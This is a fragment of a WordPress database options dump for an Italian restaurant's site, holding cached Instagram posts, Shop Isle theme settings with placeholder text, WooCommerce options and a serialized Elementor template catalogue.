ad0ffd3a3323db4217467&oe=5E7CDE52\"}},\"created_time\":\"1568006748\",\"caption\":{\"id\":\"18079523974105161\",\"text\":\"le Torte di Ausi (Ausilia )\\ud83c\\udf38\\ud83c\\udf38\\ud83c\\udf38.Festeggiare il proprio compleanno al Sol y Mar :delicatezza e genuinit\\u00e1\",\"created_time\":\"1568006748\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":35},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B2LbxE2FtMM\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2126836093643151669_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/68833117_409416162933211_7181884718397392986_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=72fcd71bfd115244eb6fa9f54389b643&oe=5E7BF2A1\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/68833117_409416162933211_7181884718397392986_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=59cdd11d7bfa648de1efa8df581fe8a5&oe=5E8A2851\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/68833117_409416162933211_7181884718397392986_n.jpg?_nc_ht=scontent.cdninstagram.com&oh=70b800613c5d533d88dc89257c2de134&oe=5E787306\"}},\"created_time\":\"1567758641\",\"caption\":{\"id\":\"18057318247165687\",\"text\":\"Ieri &  Oggi .trova le differenze\",\"created_time\":\"1567758641\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/vp\\/7531995557e342d671b102fbfdcc6cbd\\/5E740A2E\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":30},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B2ECiihFFk1\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}],\"meta\":[]}','no'),(74015,'cv_pretty_pagination_url_212','1','yes'),(74394,'woocommerce_placeholder_image','4596','yes'),(89221,'elementor_disable_color_schemes','yes','yes'),(89222,'elementor_disable_typography_schemes','yes','yes'),(89223,'woocommerce_maybe_regenerate_images_hash','009b9f948d9cef32127a1d8a35091b28','yes'),(89293,'theme_mods_shop-isle','a:10:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"shop_isle_slider\";s:661:\"[{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/slide1.jpg\",\"link\":\"#\",\"text\":\"Shop Isle\",\"subtext\":\"Tema WooCommerce \",\"label\":\"Read more\",\"id\":\"shop_isle_5c1128488396e\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/slide2.jpg\",\"link\":\"#\",\"text\":\"Shop Isle\",\"subtext\":\"Tema WooCommerce \",\"label\":\"Read more\",\"id\":\"shop_isle_5c112848839ac\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/slide3.jpg\",\"link\":\"#\",\"text\":\"Shop Isle\",\"subtext\":\"Tema WooCommerce \",\"label\":\"Read more\",\"id\":\"shop_isle_5c112848839e6\"}]\";s:17:\"shop_isle_banners\";s:457:\"[{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/banner1.jpg\",\"link\":\"#\",\"id\":\"shop_isle_5c1128488401e\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/banner2.jpg\",\"link\":\"#\",\"id\":\"shop_isle_5c11284884068\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/banner3.jpg\",\"link\":\"#\",\"id\":\"shop_isle_5c112848840af\"}]\";s:17:\"shop_isle_socials\";s:297:\"[{\"icon_value\":\"social_facebook\",\"link\":\"#\",\"id\":\"shop_isle_5c1128488439e\"},{\"icon_value\":\"social_twitter\",\"link\":\"#\",\"id\":\"shop_isle_5c112848843df\"},{\"icon_value\":\"social_dribbble\",\"link\":\"#\",\"id\":\"shop_isle_5c1128488441c\"},{\"icon_value\":\"social_skype\",\"link\":\"#\",\"id\":\"shop_isle_5c11284884458\"}]\";s:22:\"shop_isle_team_members\";s:1106:\"[{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/team1.jpg\",\"text\":\"Eva Bean\",\"subtext\":\"Developer\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit lacus, a iaculis diam.\",\"id\":\"shop_isle_5c11284884782\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/team2.jpg\",\"text\":\"Maria Woods\",\"subtext\":\"Designer\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit lacus, a iaculis diam.\",\"id\":\"shop_isle_5c112848847c2\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/team3.jpg\",\"text\":\"Booby Stone\",\"subtext\":\"Director\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit lacus, a iaculis diam.\",\"id\":\"shop_isle_5c112848847fe\"},{\"image_url\":\"http:\\/\\/www.ristorantesolymar.it\\/wp-content\\/themes\\/shop-isle\\/assets\\/images\\/team4.jpg\",\"text\":\"Anna Neaga\",\"subtext\":\"Art Director\",\"description\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit lacus, a iaculis diam.\",\"id\":\"shop_isle_5c1128488483b\"}]\";s:20:\"shop_isle_advantages\";s:634:\"[{\"icon_value\":\"icon_lightbulb\",\"text\":\"Idee e concetti\",\"subtext\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\"id\":\"shop_isle_5c11284884b61\"},{\"icon_value\":\"icon_tools\",\"text\":\"Designs e interfacce\",\"subtext\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\"id\":\"shop_isle_5c11284884ba2\"},{\"icon_value\":\"icon_cogs\",\"text\":\"Estremamente personalizzabile\",\"subtext\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\"id\":\"shop_isle_5c11284884bde\"},{\"icon_value\":\"icon_like\",\"text\":\"Facile da usare\",\"subtext\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\",\"id\":\"shop_isle_5c11284884c1a\"}]\";s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1607162195;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:5:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:14:\"recent-posts-2\";i:2;s:6:\"text-3\";i:3;s:6:\"text-4\";i:4;s:6:\"text-5\";}s:21:\"sidebar-footer-area-1\";a:1:{i:0;s:6:\"text-6\";}s:21:\"sidebar-footer-area-2\";a:1:{i:0;s:6:\"text-2\";}s:21:\"sidebar-footer-area-3\";a:0:{}s:21:\"sidebar-footer-area-4\";a:0:{}s:30:\"shop-isle-sidebar-shop-archive\";a:0:{}s:9:\"sidebar-2\";a:0:{}}}s:28:\"ti_about_recommended_plugins\";a:0:{}}','yes'),(89296,'woocommerce_thumbnail_cropping_custom_width','20','yes'),(89297,'woocommerce_thumbnail_cropping_custom_height','25','yes'),(89300,'shop_isle_update_woocommerce_customizer_controls','1','yes'),(89301,'shop_isle_wporg_flag','true','yes'),(89302,'woocommerce_catalog_rows','4','yes'),(89303,'woocommerce_catalog_columns','3','yes'),(89310,'shop_isle_migrate_translation','1','yes'),(89440,'shop_isle_section_order_migrate','yes','yes'),(89593,'elementor_version','2.3.5','yes'),(89618,'_elementor_installed_time','1544630846','yes'),(89619,'elementor_remote_info_library','a:2:{s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}s:9:\"templates\";a:439:{i:0;a:14:{s:2:\"id\";s:4:\"5525\";s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";s:10:\"1520443532\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"15\";s:11:\"trend_index\";s:2:\"10\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:14:{s:2:\"id\";s:4:\"5533\";s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";s:10:\"1520443534\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"54\";s:11:\"trend_index\";s:2:\"34\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:2;a:14:{s:2:\"id\";s:4:\"5575\";s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443543\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/cta-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"30\";s:11:\"trend_index\";s:2:\"13\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:3;a:14:{s:2:\"id\";s:4:\"5615\";s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443551\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"48\";s:11:\"trend_index\";s:2:\"26\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:4;a:14:{s:2:\"id\";s:4:\"5624\";s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443553\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"103\";s:11:\"trend_index\";s:2:\"63\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:5;a:14:{s:2:\"id\";s:4:\"5684\";s:5:\"title\";s:5:\"FAQ 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443565\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"85\";s:11:\"trend_index\";s:2:\"62\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:6;a:14:{s:2:\"id\";s:4:\"5693\";s:5:\"title\";s:5:\"FAQ 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"210\";s:11:\"trend_index\";s:3:\"208\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:7;a:14:{s:2:\"id\";s:4:\"5703\";s:5:\"title\";s:6:\"FAQ 13\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443569\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"52\";s:11:\"trend_index\";s:2:\"23\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:8;a:14:{s:2:\"id\";s:4:\"5711\";s:5:\"title\";s:5:\"FAQ 1\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443571\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"212\";s:11:\"trend_index\";s:3:\"237\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:9;a:14:{s:2:\"id\";s:4:\"5719\";s:5:\"title\";s:5:\"FAQ 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443573\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"126\";s:11:\"trend_index\";s:3:\"112\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:10;a:14:{s:2:\"id\";s:4:\"5729\";s:5:\"title\";s:5:\"FAQ 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520443575\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"316\";s:11:\"trend_index\";s:3:\"240\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:11;a:14:{s:2:\"id\";s:4:\"5737\";s:5:\"title\";s:6:\"FAQ 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443576\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"165\";s:11:\"trend_index\";s:3:\"142\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:12;a:14:{s:2:\"id\";s:4:\"5746\";s:5:\"title\";s:6:\"FAQ 11\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_4.png\";s:12:\"tmpl_created\";s:10:\"1520443578\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/faq-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"192\";s:11:\"trend_index\";s:3:\"186\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:13;a:14:{s:2:\"id\";s:4:\"5755\";s:5:\"title\";s:5:\"FAQ 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443580\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"100\";s:11:\"trend_index\";s:2:\"92\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:14;a:14:{s:2:\"id\";s:4:\"5764\";s:5:\"title\";s:5:\"FAQ 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520443582\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"314\";s:11:\"trend_index\";s:3:\"248\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:15;a:14:{s:2:\"id\";s:4:\"5773\";s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";s:10:\"1520443584\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/hero-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"45\";s:11:\"trend_index\";s:2:\"30\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:16;a:14:{s:2:\"id\";s:4:\"5783\";s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";s:10:\"1520443586\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/hero-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"332\";s:11:\"trend_index\";s:3:\"229\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:17;a:14:{s:2:\"id\";s:4:\"5792\";s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";s:10:\"1520443588\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"216\";s:11:\"trend_index\";s:3:\"236\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:18;a:14:{s:2:\"id\";s:4:\"5801\";s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";s:10:\"1520443589\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:10:\"[\"header\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"29\";s:11:\"trend_index\";s:2:\"16\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:19;a:14:{s:2:\"id\";s:4:\"5811\";s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";s:10:\"1520443591\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"110\";s:11:\"trend_index\";s:2:\"90\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:20;a:14:{s:2:\"id\";s:4:\"5820\";s:5:\"title\";s:9:\"Contact 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443593\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"179\";s:11:\"trend_index\";s:3:\"184\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:21;a:14:{s:2:\"id\";s:4:\"5828\";s:5:\"title\";s:9:\"Contact 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443595\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"306\";s:11:\"trend_index\";s:3:\"265\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:22;a:14:{s:2:\"id\";s:4:\"5836\";s:5:\"title\";s:10:\"Contact 10\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443597\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/contact-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"114\";s:11:\"trend_index\";s:3:\"116\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:23;a:14:{s:2:\"id\";s:4:\"5844\";s:5:\"title\";s:10:\"Contact 11\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/contact_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443599\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/contact-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"contact\";s:4:\"tags\";s:11:\"[\"contact\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"292\";s:11:\"trend_index\";s:3:\"281\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:24;a:14:{s:2:\"id\";s:4:\"5852\";s:5:\"title\";s:6:\"CTA 34\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2018/03/form_1.png\";s:12:\"tmpl_created\";s:10:\"1520443600\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-34/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:8:\"[\"form\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"419\";s:11:\"trend_index\";s:3:\"359\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:25;a:14:{s:2:\"id\";s:4:\"5947\";s:5:\"title\";s:7:\"Stats 